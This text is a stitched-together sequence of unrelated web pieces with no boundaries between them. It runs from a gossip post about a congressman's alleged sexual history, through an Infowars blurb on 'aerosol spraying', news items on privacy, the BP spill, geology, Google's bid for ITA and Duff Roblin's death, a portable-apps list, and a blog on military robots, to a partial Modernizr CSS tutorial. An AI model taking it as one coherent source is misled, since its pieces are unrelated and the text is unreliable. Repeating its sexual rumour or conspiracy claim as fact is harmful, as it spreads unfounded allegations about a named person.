The source who claimed to have sex with Kirk described personal details about the House , um , er , " member . "
The description was the same as the first source . "
Rogers goes on to tell of an incident where Mark Kirk himself had indicated his attraction toward men to Mr. Rogers at an almost all - gay hoity - toity DC party .
Good story , but I 'm still not sure the media is going to bite like they did with Craig .
Men fool around with other men in college .
It 's a fact of life .
They get drunk , they kiss , they spoon , they masturbate together , they might even perform fellatio on one another , and sometimes they even get so into it that coitus occurs .
When you 're 19 , you can literally screw anything and get off .
I do n't think the mainstream media is going to see Rogers ' story as proof enough to run with this story .
However , Rogers said that he was contacted by no less than five people after the vote , but here he mentions two .
That means at least three others have had a tale to tell that Rogers is hanging on to for the time being .
In addition , those were only guys paying attention to the vote that Mark Kirk was making .
After this story continues to inch its way along the information superhighway , could there be more that come forward ?
In my humble opinion , sly innuendo over mini-quiche and two drunken college indiscretions does not a homo make .
However , if seven or eight more begin to pop up , one can no longer blame it on the alcohol .
In related news , the gay Feast of Fun Podcast called to interview me on this very subject late last night : take a listen !
Infowars.com
June 4 , 2010
The establishment has gone from denying they are involved in aerosol spraying to admitting it .
Alex calls for activists to send their video clips for a documentary exposing this criminal behavior .
{openx:49}
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
Privacy advocates are raising further concerns about the use of personal information from social media sites .
They say the practice known as " sentiment analysis " or " sentiment mining " may not be illegal but it is often unethical because people are unaware it is happening .
While there are obvious privacy concerns around the misuse of hard personal data - where you live , how much you earn , your medical records and so on - they say the use of soft data such as how you feel , what you like , your values - the personal sentiments that shape your behaviour - blurs the lines of privacy protection .
" I think a lot of consumers will be quite concerned that in reality what 's happening on social networks is that there 's a lot of marketing companies sitting over your shoulder , " said Chris Connolly from the Australian Privacy Foundation .
" They 're reviewing every comment that you make - positive negative , about brands , about products , about movies , services etc and they 're collating all of this information and re-selling it to other organisations to make a profit .
" You 're not getting any benefit from that particular sale , so I think there 's a fine line between what consumers would allow that information to be used for . "
Social media companies like Facebook release enormous amounts of raw data generated by users of their sites to companies like People Browsr .
" All of the networks have what they call a feed and various people in the industry are able to access that full feed of data , " says People Browsr CEO Jodee Rich .
" Twitter makes it available , Facebook is now making it much more available , MySpace is making it available for three months , in the blog world it 's been available for some time .
" When you put all that data together you 're now getting a velocity of about 5,000 new posts every second , and that is laying down a historical framework of tweets , of posts that we can go back and look at .
" Many of those Tweets or posts contain interesting information about how people are feeling - whether it be about themselves , their country , their day , their wife , their husband , or the brands that they 're interacting with . "
Advertising strategies targeted at users of social media are developed by analysing these personal sentiments .
Advertisers argue it is helpful to consumers .
" To have products and services that are targeted more towards the sort of things that I 'm interested in is actually useful to me , rather than having random adverts that have nothing to do with me , " says Marie Claire Jenkins , a digital strategist with McCann Erickson .
" So I think consumers need to think about it as a personalised service that helps everybody . "
The targeting can also be unethical , says John Clippinger , co-director of the Law Lab at Harvard University .
" You look at the fact that Google can mine Gmail and send you offers , and you may have a discussion in an email about your doctor , about cancer and suddenly you 're getting spam from a cancer drug or something , " he said .
" These are things that really should not be encouraged . "
And Mr Clippinger says the targeting will intensify with the growing use of smart phones connected to the internet .
" The phone can know who you 're interacting with , when , what time and at what location .
That can be very powerfully predictive and create a signature or a unique pattern as to who you are and your likelihood of buying and doing certain things , " he said .
Background Briefing , Radio National , 9.10 am Sunday June 27 ( repeated 7.10 pm Tuesday June 29 )
" I 'm not talking about volume .
What I feel about the Philadelphia sound is that you get this extremely homogenous sound .
It comes from an extreme involvement from every player .
. . .
I can't say it took me by surprise , but when actually you are there experiencing to make music with that kind of sound - sound is attitude , right ?
And that attitude is really at the center of my conception of what I feel orchestral playing should be .
And I think that is why it clicked . "
President of WebFX .
Bill has over 25 years of experience in the Internet marketing industry specializing in SEO , UX , information architecture , marketing automation and more .
William 's background in scientific computing and education from Shippensburg and MIT provided the foundation for MarketingCloudFX and other key research and development projects at WebFX .
A web designer must always have his or her tools handy .
Of course , that is most often the case when you ’re working from home or from an office where you have your own work computer .
But if you are constantly on the move or are doing a lot of demonstrations to your customers at their place of business , you ’ll need to carry your programs with you .
Scenarios That Benefit the Use of Portable Apps
Most designers just carry their laptop with them .
But that is not always possible , and many times , the client wants you to show them how the site or application will look on their own computer , projector and other equipment .
In addition , there are those unfortunate times when your computer crashes and breaks with all the data on it and no ways to retrieve it .
In those cases , a good backup ( or even primary ) solution is to carry your own toolset on a portable flash / USB drive .
The Feasibility of Using Portable Apps
There are a lot of great applications for web designers that will work without needing any installation , and they make an excellent choice for a portable USB drive .
With today ’s USB stick sizes and prices , you can easily have all your work with you in your pocket at all times , and be able to work from any computer without needing anything else .
Here are some of the best portable apps for web designers that are a must - have .
KompoZer Portable ( previously known as Nvu Portable ) is an amazing HTML editor that rivals the functionality of Dreamweaver .
Sure , it does n’t look as good , but it ’s much better than Notepad if you want any advanced features and easy code editing functionalities .
Firefox , a popular web browser amongst web designers with its impressive collection of add - ons , has a portable version that you can carry around your USB drive .
It ’s just like the regular version , but does n’t need to be installed on your operating system .
XAMPP is a great local server ( learn all about it in this tutorial ) , and the portable version does its job amazingly well .
It works fine no matter what computer you insert your flash drive in , and you can easily see exactly how your site will look when loaded from a server in a browser .
You can be anywhere without an internet connection and still have a working site .
Got a web app you need to demo somewhere in the middle of the Mojave Desert ?
Have XAMPP Portable and any computer handy and you ’re good to go .
GIMP is a free alternative to Photoshop , and as you could ’ve guessed from the title of this article , it also has a portable version .
If you ’re used to Photoshop , you might find it difficult to adjust to GIMP ’s interface at first , but if you need a portable app that is as powerful as Photoshop , there is no other better alternative .
This is a simple yet powerful portable font manager that lets you view all the fonts that are installed on a computer .
It also allows you to quickly install and uninstall the fonts you need .
7 - Zip is a popular open source file archiver that handles many types of formats , including ZIP , RAR , TAR , GZ , and more .
As web workers , we always have to deal with various types of archives and — just like a Forrest Gump ’s box of chocolates — you never know what you ’re gonna get .
7 - Zip Portable allows you to be flexible and prepared for opening and creating archives .
PhotoFiltre is a simple image - retouching tool and it allows you to do basic image editing on any digital image format .
This portable app is a good companion to GIMP as it ’s easier to perform quick edits .
Use it over GIMP if you just need to perform quick and easy retouching , such as cropping and resizing .
Inkscape is an open source vector graphics editor that rivals Adobe Illustrator and looks and acts like Corel Draw ( if you ever used Corel Draw , you ’ll know what I mean when you fire up Inkscape ) .
It is standards - compliant and its portable version is the most powerful around .
Most people , including your web design clients , probably use Microsoft Word docs for rich text files :
It ’s the accepted standard .
But it ’s quite hard to find a good portable .doc file editor .
If you need a lightweight and easy alternative to OpenOffice Portable , AbiWord is the way to go .
This is an all - in - one tools package for web developers , designers and programmers .
There are a lot of tools included in PicPick Tools , from screenshot capturing to picture editing .
11 . MobaPhoto
MobaPhoto is a free and open source image manager that does n’t require an installation ( otherwise , Google ’s web - based Picasa would be a great choice ) .
It does n’t look very nice , but it gets the job done .
It ’s very useful when you have tons of photos to manage and keep track of .
12 . ToDoList
If you like / need to keep track of your time , you should definitely have this application in your pocket .
ToDoList is a simple task and project management app that will allow you to get your work done faster and more effectively .
Best Portable Apps Around for Web Designers ?
Of course , the above apps are by far not the only ones , but they ’re certainly the best .
They have been used by web designers and have proven to be very useful in their line of work .
You should definitely try getting and setting up a USB / flash drive with all these apps installed and carry them around your keychain , pocket , backpack , suitcase , etc .
If you have other portable apps that you use that is n’t on the list above , please share it with us in the comments .
Related Content
Evgeny Kuznetsov drafted by Washington Capitals ( Photo © Getty Images )
With the 26th overall pick , the Washington Capitals picked wing .
He ’s the third player to get picked in the first round after Alexander Burmistrov and Vladimir Tarasenko .
Kuznetsov , 18 , has recently signed a new 2 years deal with Traktor Chelyabinsk of the KHL , but most likely the Caps are willing to wait a bit so that he can develop at home .
Evgeny Kuznetsov had a very good rookie season with Traktor , with nine points in 35 games .
He also scored once in the playoffs .
He skated at both U20 and U18 WJC .
To some critics of the response effort by BP and the government , instances of news media being kept at bay are just another example of a broader problem of officials ’ filtering what images of the spill the public sees .
Scientists , too , have complained about the trickle of information that has emerged from BP and government sources .
Three weeks passed , for instance , from the time the Deepwater Horizon oil rig exploded on April 20 and the first images of oil gushing from an underwater pipe were released by BP .
“ I think they ’ve been trying to limit access , ” said Representative Edward J. Markey , a Democrat from Massachusetts who fought BP to release more video from the underwater rovers that have been filming the oil - spewing pipe .
“ It is a company that was not used to transparency .
It was not used to having public scrutiny of what it did . ”
Officials at BP and the government entities coordinating the response said instances of denying news media access have been anomalies , and they pointed out that the company and the government have gone to great lengths to accommodate the hundreds of journalists who have traveled to the gulf to cover the story .
The F.A.A. , responding to criticism following the incident with Southern Seaplane , has revised its flight restrictions over the gulf to allow for news media flights on a case - by - case basis .
“ Our general approach throughout this response , which is controlled by the Unified Command and is the largest ever to an oil spill , ” said David H. Nicholas , a BP spokesman , “ has been to allow as much access as possible to media and other parties without compromising the work we are engaged on or the safety of those to whom we give access . ”
A blob of the Earth 's gooey insides linked to volcanic eruptions has been detected below southern Africa .
The newly discovered blob is known to geologists as a mid-mantle plume .
Mantle plumes are columns of hot , gushy gunk that flow toward the Earth 's surface and are a known contributor to volcanic activity .
Until now , the mid-section of a mantle plume has never been imaged .
Mid-mantle plumes are hotter and move faster — roughly 4 inches ( 10 centimeters ) per year — than the scorching , molten rock deeper inside the Earth , which is called the Earth 's mantle .
The mantle buoys the sprawling rocky plates that make up the Earth 's crust .
When these plates collide with each other , volcanoes and mountain ranges are born .
The process spans millions of years , however , since an average plate moves between 0.4 and 4 inches ( 1 to 10 cm ) per year .
Mantle plumes form a heat pipeline from the Earth 's core to the upper region of the mantle .
Plumes do n't directly cause volcanoes on the Earth 's continents , but they are one ingredient in a volcanic eruption , said study team member Don Helmberger of Caltech .
There is some evidence that mantle plumes can trigger volcanic eruptions in oceanic places such as Iceland and Hawaii , Helmberger told OurAmazingPlanet .
Mantle plumes form deep within the Earth , where they can be up to 3,100 miles ( 5,000 kilometers ) wide .
As a plume head of magma rises from deep within the Earth , it tapers to roughly 62 miles ( 100 km ) wide near the upper mantle .
Using seismic data , the researchers were able to locate the mid-mantle plume under the Kaapvaal region of southern Africa .
The researchers estimate that its width is no larger than 93 miles ( 150 km ) .
The newfound mid-mantle plume is angling up toward the East African Rift — a chasm in eastern Africa that 's been growing due to the African continental plate ripping apart .
The study could help scientists understand the characteristics and dynamics of structures in the lower mantle as well as the geology of the southern African region .
The study is detailed in the May 4 issue of the journal Geophysical Research Letters .
Gallery : Volcanoes from Space
Which U.S. Volcanoes Are Most Dangerous Right Now ?
10 Wild Volcano Facts
This article was provided by OurAmazing Planet , a sister site to LiveScience .
Google 's bid to acquire ITA Software could yield some innovative ways to plan travel .
If the deal goes through , that is .
Google 's possible acquisition of ITA Software , a very quiet giant in the travel industry , has executives buzzing about the implications of the deal , which was leaked by Bloomberg on April 21 and is estimated at $ 1 billion .
Yet the prospective buy has n't attracted a great deal of attention among traveling consumers .
That 's probably because most have never heard of ITA , a Cambridge , MA , firm that was founded in 1996 and has a long - standing reputation for innovation in the travel industry .
ITA provides travel information and services to numerous U.S. airlines , online travel agencies like Orbitz.com , travel metasearch sites like Kayak , and even Micosoft 's Bing Travel .
It has been estimated that more than 50 percent of airfare searches conducted in the United States use ITA software in some form or another .
Analysts say that Google has no intention of becoming an online travel agency like Expedia or Travelocity -- primarily because Google pockets considerable advertising revenue from travel companies and does n't want to jeopardize those relationships .
But even without travel - booking capabilities , a Google - ITA partnership is likely to yield far richer search results and perhaps some innovative ways that information is displayed , analysts said .
The improvements in travel search queries could be significant , said Joe Buhler , a senior analyst with Phocuswright , a travel industry market research firm .
" The more relevant Google can make the search , the more useful Google will be as a tool for planning trips , " he said .
" Travel search is a huge vertical , and you can assume that Google has some interesting plans or else they would n't go after it . "
Buhler said it would not be surprising to see Google move into hotel data , since it is currently experimenting with displaying hotel rates on Google Maps .
And Google must surely understand that hotels have become a reliable revenue producer for online travel agencies , which earn very small commissions from airlines these days .
" Hotels are a huge potential source of revenue , " he said .
Beyond travel data itself , Google is likely to launch some fresh ways to display the information , said Norm Rose , president of Travel Tech Consulting .
" Google has done some experimenting by including hotels and prices on Google Maps , and while it 's unknown how ITA information would be displayed , I think it will be innovative , " Rose said .
" For instance , you might enter the amount of money you have to spend , and then ask where can I go this weekend ? "
Rose also sees Google creating new mobile applications that take advantage of its travel search capabilities and location - based services if the deal closes .
Possible losers in the acquisition would be travel metasearch sites like Kayak.com , Buhler said .
These sites collect data from various sources but send you to an online travel agency or airline for availability and booking .
Google is likely to do the same thing , and that does n't portend well for today 's travel metasearch sites .
Analysts agree that ITA is well respected for innovation in building solutions and resourcefulness in getting at travel data .
For instance , Rose said the company has created a sophisticated technology called Needlebase that harvests data from Web sites and a wide range of other online data to create a vertical search engine or enhance existing data .
In other words , Needlebase aims to make it possible to find almost anything , no matter how inconsequential ( it 's the needle in the haystack metaphor ) .
" So if you want to rent a bicycle in Monterrey , you should be able to grab that , " Rose said .
More Connected Traveler stories :
Hey there , time traveller !
This article was published 30/5/2010 ( 3776 days ago ) , so information in it may no longer be current .
PHIL HOSSACK / WINNIPEG FREE PRESS Duff Roblin , Manitoba 's 14th premier from 1958 to 1967 , died Sunday evening .
The Greatest Manitoban died late Sunday afternoon almost at the moment that Duff ’s Ditch was once again rescuing Winnipeg .
Duff Roblin , our 14th premier from 1958 to 1967 , died about 6 p.m. Sunday in Victoria General Hospital with his daughter Jennifer by his side , said Roblin ’s longtime friend Bill Neville .
Roblin , who would have turned 93 next month , will be forever remembered for relentlessly pursuing and achieving his vision of a floodway to carry the Red River around the city of Winnipeg , a quest he launched as an opposition backbencher shortly after the devastating 1950 flood .
Sunday afternoon was one of the countless times the floodway has been operated to avert possible disaster after near - record rainfall this weekend unleashed torrents of water into the Red .
When the Winnipeg Free Press published The Greatest Manitobans book in 2008 , the province ’s citizens named Roblin as our Greatest Manitoban .
Roblin was ridiculed mercilessly in the early 1950s , recalled Neville : " It was unnecessary , it would n’t work , or it would cost too much , or all three . "
Roblin went on to become premier in 1958 , the promise of a floodway one of his key election planks .
And Roblin lived every politician ’s dream of being derided , struggling , and eventually being vindicated , said Neville .
Vindicated indeed .
Flood - threatened communities from all over North America come here to study Duff ’s Ditch , provincial flood forecaster Alf Warkentin said Sunday .
The floodway was ready for the ominous 1969 flood , Warkentin said .
" We ’ve had about 10 serious floods that the floodway has protected the city from , " none more potentially catastrophic than the 1997 Flood of the Century .
" It ’s a great loss — he was a tremendous premier ...
He was , in modern language , a man who governed for everyone , " Premier Greg Selinger said Sunday night .
" He was a great premier and a great Canadian . "
Neville , a history professor at the University of Manitoba , said Roblin felt his greatest contribution to Manitoba was not the floodway , but the changes he made to education : taking the long - standing system in which every individual school in the province had its own school board , and creating the modern system of school divisions .
" The creation of Brandon University and the University of Winnipeg ( from colleges ) began on his watch , the beginning of the community college system , " Neville said .
" He made Manitoba a more modern place to live — his greatest contribution was to the schools , " Selinger agreed .
When Roblin began his nine years as premier in 1958 , Roblin said , " Education is not a cost or a bill or expense but a wholesome investment in human life , growth and comprehension . "
It was Roblin who promoted French - language education , Selinger pointed out .
And , said Selinger , " He modernized hospitals .
" He was a progressive conservative , with the emphasis on progressive , " said Selinger , who was struck by Roblin ’s sense of dignity .
" In a way , you felt like you always knew him , " Selinger said .
Neville profiled Roblin in The Manitoba Encyclopedia .
" No question , the floodway caught the public imagination , " Neville said .
Neville said while Roblin did not seek out the spotlight , former premier Gary Doer " made a point of keeping Duff in the loop for every aspect of the floodway , " especially the expansion now underway , and invited Roblin to attend major events .
Hugh McFadyen , leader of the Manitoba Progressive Conservative Party , said this morning : " Duff Roblin was voted the greatest Manitoban for a reason .
He faced down opposition to build the floodway .
He began the building of modern Manitoba .
Our hydro , education and road systems are all parts of his remarkable legacy .
His profound optimism about our province 's untapped potential inspire a whole new generation of Manitobans .
PHIL HOSSACK / WINNIPEG FREE PRESS Former premier Duff Roblin and then - premier Gary Doer laugh while " ceremonially " moving dirt as part of funding ceremonies at the Floodway in 2005 .
" Over the past few years I have appreciated his thoughtful advice on the major challenges facing our province today .
He was a gentleman in every sense .
My condolences go out to his family and close friends . "
Former Conservative premier Gary Filmon saw Roblin as his mentor .
" I met him when I was running for city council , he was a constituent of mine , " said Filmon , who said Roblin would not outright tell Filmon if he had Roblin ’s vote .
" I had the pleasure of playing squash with him .
We ’d sit in the locker room , with towels around , and talk politics , " said Filmon .
" There are so many legacies , " and while many people will forever link Roblin to the floodway , said Filmon , it was Roblin who introduced regional secondary schools and community colleges .
Filmon said when his government launched a review of the entire postsecondary system in the 1990s , it was obvious no one knew more about colleges and universities than Roblin : " The people at Red River College , to this day , credit their expansion to that report , " said Filmon .
" I ’m very , very saddened . "
As the book The Greatest Manitobans noted , Roblin ’s government was a busy one .
It brought in a regional government for Winnipeg , crop insurance for farmers , new highways to access the north and a social allowance program to help the province ’s most needy .
There was also the creation of two new provincial parks , Grand Beach and Birds Hill — two of the most popular parks in the province today .
Less popular was the Roblin government ’s introduction of a provincial sales tax .
Then - prime minister Pierre Trudeau appointed Roblin to the Senate in 1978 , where he served until his retirement in 1992 at age 75 .
To relieve stress during long days , Roblin played the bagpipes in his office .
" The cleaning staff soon got used to it , " he quipped in his 1999 autobiography .
Neville said Roblin had been ill for about eight months , but his health had declined markedly in the last three weeks .
Roblin is survived by wife Mary , two children and five grandchildren .
The Roblins had lived in the same River Heights house for the past 35 years .
No funeral arrangements have been made yet .
— With files from Laurie Bailey , Margo Goodhand , Bruce Owen and Aldo Santin
nick.martin@freepress.mb.ca
LEGACY OF A LEADER
- Duff Roblin was born in Winnipeg in 1917 , the grandson of Sir Rodmond Roblin , who was Manitoba ’s premier from 1900 to 1915 .
- He served overseas with the Royal Canadian Air Force during the Second World War and retired in 1946 as Wing Commander .
- He was first elected to the Manitoba legislature in 1949 .
- He became leader of the provincial Conservatives in 1954 .
- Four years later , Roblin led his party to success in the first of four Manitoba elections and was premier until 1967 when he resigned .
- In 1967 , Roblin was a leadership candidate for the federal Conservative party .
He lost to Robert Stanfield .
- In 1978 , Roblin was appointed to the Senate by Prime Minister Pierre Trudeau .
He became Leader of the Government in the Senate under Prime Minister Brian Mulroney .
- In 1992 , he retired from the Senate at age 75 .
VOICES
" If you asked him , he ’d say education was his greatest accomplishment , the reorganization of the school system "
— Manitoba historian Bill Neville
" He made Manitoba a more modern place to live — his greatest contribution was to the schools . "
— Premier Greg Selinger
" Duff was truly a visionary .
The irony is that one of the best things he ’ll be known for is the floodway but any time I spoke to Duff he said ‘ Do n’t underestimate the power of education . ’ "
— former Conservative leader
Stuart Murray
" Duff Roblin led a Conservative administration the likes we ’ve not seen elsewhere in Canada and not likely to see again .
It was positive in every respect .
He brought Manitoba into the modern era , with desired changes in education , hospital finance , roads , social assistance and flood protection . "
— former Manitoba premier Ed Schreyer
" The first time I saw Duff Roblin was when I was a member of the Youth Parliament in the 1950s and he spoke to us .
I was quite impressed with his oratory and his ability to communicate . "
— former Manitoba premier Howard Pawley
" As far as Manitoba is concerned , Duff Roblin made the Conservatives a progressive Conservative party . "
— former Manitoba NDP minister Sidney Green
Please send remembrances and anecdotes about Duff Roblin to city.desk@freepress.mb.ca .
You can also use the comment form below to leave your thoughts .
We also encourage letters to the editor on this topic .
cryptogon.com news – analysis – conspiracies
May 29th , 2010
Via : TechnoFascism Blog :
“ It will save lives ” , or so the argument goes .
Sending a robot warrior onto the battlefield instead of humans seems like the logical next step in a world moving toward greater efficiency and automation .
Everyone seems in love with this new technological trend of automated devastation : from the corporations that will profit from the sale of them ; to the military leaders who admire the increased killing power of the robotic drones .
As I write this , in 2010 , fully autonomous killer robots are still in the early trial phase , when scientists are still working out the bugs and lawyers are still clambering over liability issues .
However , according to recent estimates there are at least 6000 robots at some level of autonomous operation in active deployment in Iraq and Afghanistan .
According to an article in Military Aerospace , former U.S. Air Force ( USAF ) Chief of Staff General T. Michael Moseley said , “ We ’ve moved from using UAVs primarily in intelligence , surveillance , and reconnaissance roles before Operation Iraqi Freedom , to a true hunter - killer role with the Reaper . ”
Currently , the U.S. Air Force ’s fleet stands at 195 Predators and 28 Reapers .
As the armed forces rapidly move toward greater use of these robotic warriors , one can only wonder what this horrific automated battlefield will look like twenty years from now .
Fortunately for us , there is no need to speculate about the future role of killer robots .
We have only to look at one of the military ’s playbooks for the development and deployment of robotic systems : the “ 2009 Unmanned Systems Integrated Roadmap ” released by the U.S. Department of Defense .
The main point that can be gleaned from a careful reading of this Roadmap is not if the front - line military will be composed almost entirely of automated , killer robots but when .
And we do n’t have to wonder too long about when either , for this document gives the answer to that question too : by about 2034 — if everything goes according to plan .
Are you a spy with a James Bond mission and a Mr. Bean budget ?
The camera - equipped and electric - powered Terrestrial Shrub Rover is the " car " for you .
Why ?
It 's disguised as a well - manicured shrub .
The Terrestrial Shrub was designed by Jason Shull and made its big public debut at Grounds for Sculpture last October .
The Shrub Rover is powered by plug - in solar electricity and is underpinned by a compact go - kart frame with a fiberglass dome and glued on faux foliage .
Advertisement
The enclosed nature of the shrub requires outward facing video cameras to pipe in a view of the outside world .
It 's so convincing you 're shocked to see a door open at the end of the above video .
It looks like the scene in a Loony Tunes cartoon where Bugs Bunny hides in a bush and walks around Elmer Fudd , deftly avoiding his gaze and perhaps throwing on a dress and wig whilst hiding .
We say make it faster and this could be a riot at a park or golf course .
[ Justin Shull via Neatorama ]
Buddy ’s Cannabis Patient Collective will stay open in Mountain View — at least for a couple more days .
Though Mountain View officials sought a preliminary injunction to shut down the medical marijuana dispensary on Bayshore Parkway that opened in April despite a city ban , Santa Clara County Superior Court Judge Joseph Huber said after a hearing Wednesday he would review the request .
Huber said he is concerned about the difference between a permanent injunction and the requested preliminary injunction , which would shut down Buddy ’s immediately while lawsuits between the dispensary and city are resolved .
A preliminary injunction would assume that Buddy ’s is causing harm .
Huber told lawyers for both sides that many of their arguments would apply better to a permanent injunction and that he plans to issue a ruling within a few days .
In the hourlong hearing in San Jose , an attorney representing the city — Thomas Brown of the law firm Hanson Bridgett — described Buddy ’s operation as “ purely a violation of local law . ”
The dispensary broke four city laws when it opened , Brown said .
It violated the ban on medical marijuana dispensaries , conflicted with the city ’s zoning rules , operated without a business license and did interior construction work without proper permits .
The city has the right to regulate zoning , Brown said , and it would be “ utter chaos ” if business owners were allowed to open up wherever and whenever they want .
“ All your honor has to be able to do is just be able to imagine that the city council and the city have a rational basis for their decision ” in banning dispensaries , Brown said .
“ That ’s the constitutional standard that applies here . ”
Matt Kumin of KuminSommers , who is representing Buddy ’s , argued that the city ’s ban violates state and federal constitutional rights to privacy and equal protection .
“ I do n’t have a constitutional right to chew gum , ” he said , “ but I do have the right for the government to leave me alone . ”
The city ’s laws treat medical marijuana patients “ like some lepers , like some criminals , ” Kumin said , and they do n’t meet the “ rational basis ” standard that Brown described .
“ The city of Mountain View is terrified of medical cannabis , and they ’re fearful , and those fears are irrational , ” Kumin said .
Because of the constitutional issues involved , Kumin said , the city needs to show a “ compelling interest ” that its medical marijuana ban is necessary .
“ This is about ( a patient ’s ) body , ” Kumin said , “ and there can be nothing more fundamental than the authority to do things to your body , to try to fix your body . ”
After the hearing , Brown and City Attorney Jannie Quinn declined to comment until the judge issues a ruling .
Matt Lucero , a former corporate lawyer who opened Buddy ’s with his nephew , said he was encouraged by the judge ’s attitude and his focus on the difference between permanent and preliminary injunctions .
“ He ’s being very deliberate and clearly understands that this is not a clear - cut case , that there are constitutional issues at stake , ” Lucero said .
E-mail Diana Samuels at dsamuels@dailynewsgroup.com .
Ten years ago , only the most cutting - edge web designers used CSS for layouts and styling .
Browser support for CSS layouts was slim and buggy , so these people advocated for web standards adherence , while creating hacks that made CSS layouts work in all browsers .
One hack that became widely used was browser sniffing : Detecting which browser and version the user had by looking at the navigator .
userAgent property in JavaScript .
Browser sniffing allowed for quick and easy code forking , allowing developers to target different browsers with different instructions .
Article Continues Below
Today , CSS - based layouts are commonplace and every browser has pretty solid support for them .
But now we have CSS3 and HTML5 , and the situation is repeating itself — different browsers demonstrate varying levels of support for these new technologies .
We ’ve smartened up , however , and no longer employ CSS hacks nor use browser sniffing — an unreliable , poor practice .
We ’ve also convinced more and more clients that websites do n’t need to look exactly the same in every browser .
So how do we deal with this new but familiar problem ?
Simple :
We use feature detection , which means that we do not ask the browser “ who are you ? ” and make unreliable assumptions from there on .
Instead we ask the browser , “ can you do this and that ? ”
It ’s a simple way to test browser capabilities , but doing all these tests manually all the time gets tiresome .
To solve that problem ( and others ) , you can use Modernizr .
Modernizr : the feature - detection library for HTML5 and CSS3#section2
Modernizr is an open - source JavaScript library that makes it easy for web designers to support different levels of experiences , based on the capabilities of the visitor ’s browser .
This allows designers to take full advantage of everything in HTML5 and CSS3 that is implemented in some browsers , without sacrificing control over the user experience in other browsers .
When you embed the Modernizr script in your page , it detects whether the current browser supports CSS3 features like @font - face , border - radius , border - image , box - shadow , rgba ( ) and so forth , as well as HTML5 features like audio , video , localStorage , and the new < input > element types and attributes .
With this knowledge , you can take advantage of these native implementations in browsers that support these features , and decide whether to create a JavaScript - based fallback or simply gracefully degrade the page in browsers that do n’t support them .
Additionally , Modernizr makes the new HTML5 elements available for styling in Internet Explorer , so that you can start using their improved semantics right away .
Modernizr was created based on the principle of progressive enhancement , so it supports — encourages , even — building your website layer by layer , starting with a JavaScript - free foundation and adding layers of enhancement one by one .
This is easy with Modernizr , since you ’ll know what the browser is capable of .
Let ’s look at a practical example of how to use Modernizr to build cutting - edge websites .
Getting Started with Modernizr#section3
Start by downloading the latest stable release at www.modernizr.com, where you can also see the full list of features it detects .
Once you have the latest version , 1.5 at the time of this writing , include it in your page ’s < head > section :
<! DOCTYPE html > < html > < head > < meta charset = " utf - 8 " > < title > My Beautiful Sample Page </ title > < script src=" modernizr-1.5.min.js " ></ script > </ head > …
Next , add the class “ no -js ” to the < html > element :
< html class = “ no - js ” >
When Modernizr runs , it will replace that class with the class “ js ” which allows you to know , in your CSS , whether or not JavaScript is enabled .
But Modernizr does n’t stop there :
It will add classes for every feature it detects , prefixing them with “ no - ” if the browser does n’t support it .
So , your < html > element will look something like this upon pageload ( providing JavaScript is enabled ) :
< html class= “ js canvas canvastext no-geolocation rgba hsla multiplebgs borderimage borderradius boxshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions video audio localstorage sessionstorage webworkers applicationcache fontface ” >
Modernizr also creates a JavaScript object , simply called Modernizr , which has a list of properties that contain boolean values for each feature .
Modernizr.canvas will be true if the browser supports the new canvas element , and false if the browser does not support it .
The JavaScript object also contains more detailed information about certain features , for example : Modernizr.video.h264 will tell you if the browser supports that particular codec .
Modernizr.inputtypes.search will tell you if the new search input type is supported , and so forth .
Our raw sample page is looking a little bare - bones , but it ’s highly semantic and accessible .
Let ’s give it some basic styling ; some formatting , color , and layout to make it a little more visually pleasing .
So far , this process is nothing new : we ’re adding simple CSS to a semantically structured HTML page , and the result — while basic — is very straightforward .
Next , let ’s enhance the page and make it more interesting .
I want to use a fancy ( open license ) font for the h1 header , split the list of features into two columns , and move the section about Modernizr with a photo to the right of everything .
I ’m also going to change the border around the page and make it nicer .
Now , CSS is pretty great because you can just add new properties to a rule , and if the browser does n’t recognize ( read : support ) them , it simply ignores them .
Combine that with the cascading nature of CSS , and you can use things like border - radius without having to rely on Modernizr .
However , using Modernizr does offer something you can’t achieve without it :
The ability to change properties that the browser does support , only on the condition that it supports some other property .
I ’ll illustrate this by adding two new CSS rules to our page :
. borderradius # content { border : 1 px solid # 141414 ; - webkit - border - radius : 12 px ; - moz - border - radius : 12 px ; border - radius : 12 px ; } .boxshadow # content { border : none ; - webkit-box - shadow : rgba ( 0,0,0 , .5 ) 3 px 3 px 6 px ; - moz - box - shadow : rgba ( 0,0,0 , .5 ) 3 px 3 px 6 px ; box - shadow : rgba ( 0,0,0 , .5 ) 3 px 3 px 6 px ; }
The first rule adds a nice 12 pixel rounded corner to our # content element .
However , the original rule we had for # content specified a border of “ 2px outset # 666 ” , which looked nice when the box had square corners but with rounded corners , it ’s not so nice .
Thanks to Modernizr , I can instruct the browser to render only a solid , one - pixel border if the browser supports border - radius .
The second rule takes this a little bit further by adding a drop shadow to the #content element , and removes the border altogether if the browser supports the box - shadow property .
Why ?
Because most browsers do n’t render the border - with - border - radius combination , and box - shadow very nicely .
( A flaw in browsers , it should be noted , but something we have to live with for now . )
I ’d rather use the drop shadow around our element than not use a drop shadow and only use a border .
This way , I can have the best of all worlds , or rather , the best of all CSS : browsers that support the box - shadow property will show us a nice drop shadow , browsers that only support border - radius will show us nice rounded corners with a thinner border , and browsers that support neither get our original two - pixel outset border .
In our next example we add a special font for our header .
Here ’s our original h1 declaration , which we ’re not changing but I ’m highlighting here for the example :
h1 { color : # e33a89 ; font : 27px / 27px Baskerville , Palatino , " Palatino Linotype " , " Book Antiqua " , Georgia , serif ; margin : 0 ; text - shadow : # aaa 5 px 5 px 5 px ; }
This declaration worked fine for our basic page , and the font size of 27 pixels is fine for all of these fonts , but it is far too small for our custom font , named Beautiful .
Let ’s add the CSS rules to use it :
@font - face { src : url ( Beautiful - ES.ttf ) ; font - family : " Beautiful " ; } . fontface h1 { font : 42px / 50 px Beautiful ; text - shadow : none ; }
First , we add the @font - face declaration wherein we specify the path , filename , and font - family name for our custom font .
Then we add the font choice in a CSS rule to our h1 element , but as you can see , I ’m giving it a much bigger font size .
That ’s because the Beautiful font renders much smaller than all the other fonts I specified for the h1 element , and so we have to instruct the browser to render our header at a much larger size , but only when it renders our custom font .
Additionally , our beautiful script font has some issues with text shadow rendering , so I ’m removing the shadow when the browser decides to render the custom font .
Also , the list of features still needs to be split up .
To do so , I want to use the awesome CSS columns feature , which allows browsers to intelligently separate a list into columns without messing up its order — and our list , though not visibly numbered , is ordered alphabetically .
